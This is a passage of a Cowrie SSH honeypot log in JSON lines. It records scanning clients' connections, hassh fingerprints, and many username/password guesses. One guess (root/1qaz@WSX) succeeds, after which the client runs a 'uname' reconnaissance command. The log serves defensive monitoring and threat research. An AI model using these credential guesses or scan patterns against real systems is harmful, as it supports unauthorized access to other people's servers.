hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T11:42:38.505923Z","src_ip":"212.227.125.160","session":"ba17557007a5"}
{"eventid":"cowrie.login.failed","username":"solv","password":"solana","message":"login attempt [solv/solana] failed","sensor":"my-vps","timestamp":"2025-08-26T11:42:39.227458Z","src_ip":"212.227.125.160","session":"ba17557007a5"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":56880,"dst_ip":"1.2.3.4","dst_port":22,"session":"55d4b3672c21","protocol":"ssh","message":"New connection: 83.168.105.65:56880 (1.2.3.4:22) [session: 55d4b3672c21]","sensor":"my-vps","timestamp":"2025-08-26T11:42:40.026083Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:42:40.027758Z","src_ip":"83.168.105.65","session":"55d4b3672c21"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:42:40.063272Z","src_ip":"83.168.105.65","session":"55d4b3672c21"}
{"eventid":"cowrie.login.failed","username":"es","password":"123456","message":"login attempt [es/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:42:40.172225Z","src_ip":"83.168.105.65","session":"55d4b3672c21"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:42:40.473654Z","src_ip":"212.227.125.160","session":"ba17557007a5"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:42:41.209728Z","src_ip":"83.168.105.65","session":"55d4b3672c21"}
{"eventid":"cowrie.session.closed","duration":30.440418481826782,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:42:42.099539Z","src_ip":"212.227.125.160","session":"789147cc5348"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44464,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca9323d0d591","protocol":"ssh","message":"New connection: 212.227.125.160:44464 (1.2.3.4:22) [session: ca9323d0d591]","sensor":"my-vps","timestamp":"2025-08-26T11:42:42.111635Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:42:42.113342Z","src_ip":"212.227.125.160","session":"ca9323d0d591"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:42:42.163052Z","src_ip":"212.227.125.160","session":"ca9323d0d591"}
{"eventid":"cowrie.login.failed","username":"jyvtc","password":"jyvtc","message":"login attempt [jyvtc/jyvtc] failed","sensor":"my-vps","timestamp":"2025-08-26T11:42:42.366792Z","src_ip":"212.227.125.160","session":"ca9323d0d591"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:42:43.695464Z","src_ip":"212.227.125.160","session":"ca9323d0d591"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45234,"dst_ip":"1.2.3.4","dst_port":22,"session":"1de6ff1aedcc","protocol":"ssh","message":"New connection: 212.227.125.160:45234 (1.2.3.4:22) [session: 1de6ff1aedcc]","sensor":"my-vps","timestamp":"2025-08-26T11:42:47.840222Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:42:47.841008Z","src_ip":"212.227.125.160","session":"1de6ff1aedcc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:42:47.892191Z","src_ip":"212.227.125.160","session":"1de6ff1aedcc"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":37090,"dst_ip":"1.2.3.4","dst_port":22,"session":"08c4ecd5ae62","protocol":"ssh","message":"New connection: 196.251.86.249:37090 (1.2.3.4:22) [session: 08c4ecd5ae62]","sensor":"my-vps","timestamp":"2025-08-26T11:42:48.045592Z"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker","message":"login attempt [worker/worker] failed","sensor":"my-vps","timestamp":"2025-08-26T11:42:48.048078Z","src_ip":"212.227.125.160","session":"1de6ff1aedcc"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:42:49.078594Z","src_ip":"196.251.86.249","session":"08c4ecd5ae62"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:42:49.079367Z","src_ip":"196.251.86.249","session":"08c4ecd5ae62"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:42:49.102964Z","src_ip":"212.227.125.160","session":"1de6ff1aedcc"}
{"eventid":"cowrie.login.failed","username":"git","password":"123","message":"login attempt [git/123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:42:50.814612Z","src_ip":"196.251.86.249","session":"08c4ecd5ae62"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:42:52.373927Z","src_ip":"196.251.86.249","session":"08c4ecd5ae62"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46004,"dst_ip":"1.2.3.4","dst_port":22,"session":"bca5df8d2169","protocol":"ssh","message":"New connection: 212.227.125.160:46004 (1.2.3.4:22) [session: bca5df8d2169]","sensor":"my-vps","timestamp":"2025-08-26T11:42:53.534515Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:42:53.637762Z","src_ip":"212.227.125.160","session":"bca5df8d2169"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:42:53.654273Z","src_ip":"212.227.125.160","session":"bca5df8d2169"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@WSX","message":"login attempt [root/1qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:42:53.901925Z","src_ip":"212.227.125.160","session":"bca5df8d2169"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:42:54.099637Z","src_ip":"212.227.125.160","session":"bca5df8d2169"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:42:54.100309Z","src_ip":"212.227.125.160","session":"bca5df8d2169"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:42:54.419247Z","src_ip":"212.227.125.160","session":"bca5df8d2169"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:42:54.420349Z","src_ip":"212.227.125.160","session":"bca5df8d2169"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":55190,"dst_ip":"1.2.3.4","dst_port":22,"session":"3f282c9436c3","protocol":"ssh","message":"New connection: 83.168.105.65:55190 (1.2.3.4:22) [session: 3f282c9436c3]","sensor":"my-vps","timestamp":"2025-08-26T11:42:55.176291Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:42:55.177425Z","src_ip":"83.168.105.65","session":"3f282c9436c3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:42:55.214585Z","src_ip":"83.168.105.65","session":"3f282c9436c3"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T11:42:55.328055Z","src_ip":"83.168.105.65","session":"3f282c9436c3"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:42:56.367996Z","src_ip":"83.168.105.65","session":"3f282c9436c3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46776,"dst_ip":"1.2.3.4","dst_port":22,"session":"66d027c8ebaa","protocol":"ssh","message":"New connection: 212.227.125.160:46776 (1.2.3.4:22) [session: 66d027c8ebaa]","sensor":"my-vps","timestamp":"2025-08-26T11:42:59.229141Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:42:59.229937Z","src_ip":"212.227.125.160","session":"66d027c8ebaa"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:42:59.282295Z","src_ip":"212.227.125.160","session":"66d027c8ebaa"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456","message":"login attempt [developer/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:42:59.462413Z","src_ip":"212.227.125.160","session":"66d027c8ebaa"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:43:00.559136Z","src_ip":"212.227.125.160","session":"66d027c8ebaa"}
{"eventid":"cowrie.session.closed","duration":30.89270853996277,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:43:04.045258Z","src_ip":"49.51.141.176","session":"e4ff8ec8fd94"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47550,"dst_ip":"1.2.3.4","dst_port":22,"session":"2216de40f662","protocol":"ssh","message":"New connection: 212.227.125.160:47550 (1.2.3.4:22) [session: 2216de40f662]","sensor":"my-vps","timestamp":"2025-08-26T11:43:05.364369Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:43:05.365058Z","src_ip":"212.227.125.160","session":"2216de40f662"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:43:05.417782Z","src_ip":"212.227.125.160","session":"2216de40f662"}
{"eventid":"cowrie.login.failed","username":"user","password":"111111","message":"login attempt [user/111111] failed","sensor":"my-vps","timestamp":"2025-08-26T11:43:05.572073Z","src_ip":"212.227.125.160","session":"2216de40f662"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:43:06.625130Z","src_ip":"212.227.125.160","session":"2216de40f662"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":60516,"dst_ip":"1.2.3.4","dst_port":22,"session":"af45aa54cd19","protocol":"ssh","message":"New connection: 83.168.105.65:60516 (1.2.3.4:22) [session: af45aa54cd19]","sensor":"my-vps","timestamp":"2025-08-26T11:43:10.692865Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:43:10.693874Z","src_ip":"83.168.105.65","session":"af45aa54cd19"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:43:10.729956Z","src_ip":"83.168.105.65","session":"af45aa54cd19"}
{"eventid":"cowrie.login.failed","username":"user","password":"123","message":"login attempt [user/123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:43:10.839712Z","src_ip":"83.168.105.65","session":"af45aa54cd19"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":48316,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa179f6af95d","protocol":"ssh","message":"New connection: 212.227.125.160:48316 (1.2.3.4:22) [session: aa179f6af95d]","sensor":"my-vps","timestamp":"2025-08-26T11:43:10.884682Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:43:10.885480Z","src_ip":"212.227.125.160","session":"aa179f6af95d"}
